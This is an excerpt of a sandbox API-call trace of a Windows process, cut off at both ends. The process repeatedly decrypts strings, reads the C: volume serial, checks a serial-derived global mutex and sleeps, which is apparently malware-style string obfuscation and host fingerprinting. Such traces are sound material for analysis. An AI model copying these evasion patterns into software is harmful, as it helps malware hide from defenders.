Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0059.572] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0059.572] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a682d0 [0059.572] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71c40) returned 1 [0059.572] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0059.572] CryptDecrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a682d0, pdwDataLen=0x298f9a8 | out: pbData=0x2a682d0, pdwDataLen=0x298f9a8) returned 1 [0059.572] CryptDestroyKey (hKey=0xf71c40) returned 1 [0059.572] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a682d0 | out: hHeap=0x2a60000) returned 1 [0059.572] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0059.572] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0059.572] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0059.573] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0059.573] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0059.573] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0059.573] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71cc0) returned 1 [0059.573] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0059.573] CryptDecrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0059.573] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0059.573] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0059.573] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x300 [0059.573] WaitForSingleObject (hHandle=0x300, dwMilliseconds=0x0) returned 0x102 [0059.573] CloseHandle (hObject=0x300) returned 1 [0059.573] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0059.573] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0059.573] Sleep (dwMilliseconds=0x3e8) [0061.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0061.038] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71a00) returned 1 [0061.038] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0061.038] CryptDecrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0061.038] CryptDestroyKey (hKey=0xf71a00) returned 1 [0061.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0061.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0061.038] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68400 [0061.038] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf72000) returned 1 [0061.038] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0061.038] CryptDecrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68400, pdwDataLen=0x298f9a8 | out: pbData=0x2a68400, pdwDataLen=0x298f9a8) returned 1 [0061.038] CryptDestroyKey (hKey=0xf72000) returned 1 [0061.038] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68400 | out: hHeap=0x2a60000) returned 1 [0061.039] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0061.039] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0061.039] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0061.039] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0061.039] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0061.039] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71b00) returned 1 [0061.039] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0061.039] CryptDecrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0061.039] CryptDestroyKey (hKey=0xf71b00) returned 1 [0061.039] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0061.039] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x334 [0061.039] WaitForSingleObject (hHandle=0x334, dwMilliseconds=0x0) returned 0x102 [0061.039] CloseHandle (hObject=0x334) returned 1 [0061.039] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0061.039] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0061.039] Sleep (dwMilliseconds=0x3e8) [0062.299] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0062.302] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71cc0) returned 1 [0062.440] CryptSetKeyParam (hKey=0xf71cc0, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0062.440] CryptDecrypt (in: hKey=0xf71cc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0062.440] CryptDestroyKey (hKey=0xf71cc0) returned 1 [0062.440] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0062.440] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0062.440] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a688c0 [0062.440] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71dc0) returned 1 [0062.440] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0062.440] CryptDecrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a688c0, pdwDataLen=0x298f9a8 | out: pbData=0x2a688c0, pdwDataLen=0x298f9a8) returned 1 [0062.440] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0062.440] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a688c0 | out: hHeap=0x2a60000) returned 1 [0062.440] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0062.440] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0062.440] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0062.440] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0062.441] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0062.441] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0062.441] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf720c0) returned 1 [0062.441] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0062.441] CryptDecrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0062.441] CryptDestroyKey (hKey=0xf720c0) returned 1 [0062.441] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0062.441] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x30c [0062.441] WaitForSingleObject (hHandle=0x30c, dwMilliseconds=0x0) returned 0x102 [0062.441] CloseHandle (hObject=0x30c) returned 1 [0062.441] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0062.441] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0062.441] Sleep (dwMilliseconds=0x3e8) [0063.591] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0063.591] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf72000) returned 1 [0063.591] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0063.591] CryptDecrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0063.592] CryptDestroyKey (hKey=0xf72000) returned 1 [0063.592] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0063.592] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0063.592] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68660 [0063.592] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71f80) returned 1 [0063.592] CryptSetKeyParam (hKey=0xf71f80, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0063.592] CryptDecrypt (in: hKey=0xf71f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68660, pdwDataLen=0x298f9a8 | out: pbData=0x2a68660, pdwDataLen=0x298f9a8) returned 1 [0063.592] CryptDestroyKey (hKey=0xf71f80) returned 1 [0063.592] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68660 | out: hHeap=0x2a60000) returned 1 [0063.592] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0063.592] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0063.592] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0063.592] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0063.980] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0063.980] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0063.980] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71e00) returned 1 [0063.980] CryptSetKeyParam (hKey=0xf71e00, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0063.980] CryptDecrypt (in: hKey=0xf71e00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0063.980] CryptDestroyKey (hKey=0xf71e00) returned 1 [0063.980] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0063.980] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x2e4 [0063.980] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0x0) returned 0x102 [0063.980] CloseHandle (hObject=0x2e4) returned 1 [0063.980] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0063.980] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0063.980] Sleep (dwMilliseconds=0x3e8) [0065.497] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0065.497] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71f40) returned 1 [0065.497] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0065.497] CryptDecrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0065.497] CryptDestroyKey (hKey=0xf71f40) returned 1 [0065.497] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0065.498] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0065.498] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68828 [0065.498] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf72080) returned 1 [0065.498] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0065.498] CryptDecrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68828, pdwDataLen=0x298f9a8 | out: pbData=0x2a68828, pdwDataLen=0x298f9a8) returned 1 [0065.498] CryptDestroyKey (hKey=0xf72080) returned 1 [0065.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68828 | out: hHeap=0x2a60000) returned 1 [0065.498] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0065.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0065.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0065.498] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0065.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0065.498] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0065.498] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf72180) returned 1 [0065.498] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0065.498] CryptDecrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0065.498] CryptDestroyKey (hKey=0xf72180) returned 1 [0065.498] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0065.498] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x344 [0065.498] WaitForSingleObject (hHandle=0x344, dwMilliseconds=0x0) returned 0x102 [0065.498] CloseHandle (hObject=0x344) returned 1 [0065.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0065.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0065.498] Sleep (dwMilliseconds=0x3e8) [0066.718] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0066.719] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71e40) returned 1 [0066.719] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0066.719] CryptDecrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0066.719] CryptDestroyKey (hKey=0xf71e40) returned 1 [0066.719] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a4a8 [0066.719] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a4d0 [0066.719] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a68070 [0066.719] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf72040) returned 1 [0066.719] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0066.719] CryptDecrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a68070, pdwDataLen=0x298f9a8 | out: pbData=0x2a68070, pdwDataLen=0x298f9a8) returned 1 [0066.719] CryptDestroyKey (hKey=0xf72040) returned 1 [0066.719] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a68070 | out: hHeap=0x2a60000) returned 1 [0066.719] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a4a8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0066.719] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4d0 | out: hHeap=0x2a60000) returned 1 [0066.719] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0066.719] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0066.719] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4a8 | out: hHeap=0x2a60000) returned 1 [0066.719] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a480 [0066.719] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf72080) returned 1 [0066.719] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0066.719] CryptDecrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298fa04 | out: pbData=0x2a6a480, pdwDataLen=0x298fa04) returned 1 [0066.719] CryptDestroyKey (hKey=0xf72080) returned 1 [0066.719] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a4c8 [0066.719] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x330 [0066.719] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x0) returned 0x102 [0066.720] CloseHandle (hObject=0x330) returned 1 [0066.720] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0066.720] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a4c8 | out: hHeap=0x2a60000) returned 1 [0066.720] Sleep (dwMilliseconds=0x3e8) [0068.277] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a6a480 [0068.566] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf71b40) returned 1 [0068.567] CryptSetKeyParam (hKey=0xf71b40, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0068.567] CryptDecrypt (in: hKey=0xf71b40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a480, pdwDataLen=0x298f9d0 | out: pbData=0x2a6a480, pdwDataLen=0x298f9d0) returned 1 [0068.567] CryptDestroyKey (hKey=0xf71b40) returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a6a5e8 [0068.567] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a6a520 [0068.567] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a685c8 [0068.567] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf71e40) returned 1 [0068.567] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0068.567] CryptDecrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a685c8, pdwDataLen=0x298f9a8 | out: pbData=0x2a685c8, pdwDataLen=0x298f9a8) returned 1 [0068.567] CryptDestroyKey (hKey=0xf71e40) returned 1 [0068.567] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a685c8 | out: hHeap=0x2a60000) returned 1 [0068.567] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a6a5e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0068.567] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a520 | out: hHeap=0x2a60000) returned 1 [0068.567] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a480 | out: hHeap=0x2a60000) returned 1 [0068.567] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0068.567] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a5e8 | out: hHeap=0x2a60000) returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a6a8b0 [0068.567] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf71a00) returned 1 [0068.567] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0068.567] CryptDecrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a6a8b0, pdwDataLen=0x298fa04 | out: pbData=0x2a6a8b0, pdwDataLen=0x298fa04) returned 1 [0068.567] CryptDestroyKey (hKey=0xf71a00) returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a6a8f8 [0068.567] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x338 [0068.567] WaitForSingleObject (hHandle=0x338, dwMilliseconds=0x0) returned 0x102 [0068.567] CloseHandle (hObject=0x338) returned 1 [0068.567] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a6a8b0 | out: 